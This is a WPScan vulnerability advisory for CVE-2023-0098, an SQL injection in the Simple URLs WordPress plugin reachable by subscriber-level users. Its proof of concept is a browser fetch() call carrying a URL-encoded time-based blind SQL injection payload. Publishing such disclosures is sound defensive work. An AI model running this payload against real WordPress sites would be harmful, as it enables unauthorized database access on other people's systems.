WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Simple URLs < 115 - Subscriber+ SQLi

Description

The plugin does not escape some parameters before using them in various SQL statements used by AJAX actions available by any authenticated users, leading to a SQL injection exploitable by low privilege users such as subscriber.

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user and notice the delay of 5s to receive the response

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=lasso_lite_group_get_list&page=1&keyword=v%27%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F9434%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%285%29%29%29kcCp%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27oJFG%27%3D%27oJFG',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data)); 

Affects Plugins

simple-urls
Fixed in version 115

References

CVE
CVE-2023-0098

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

dc11

Submitter

dc11

Verified

Yes

WPVDB ID
db0b3275-40df-404e-aa8d-53558f0122d8

Timeline

Publicly Published

2023-01-17 (about 4 months ago)

Added

2023-01-17 (about 4 months ago)

Last Updated

2023-01-17 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us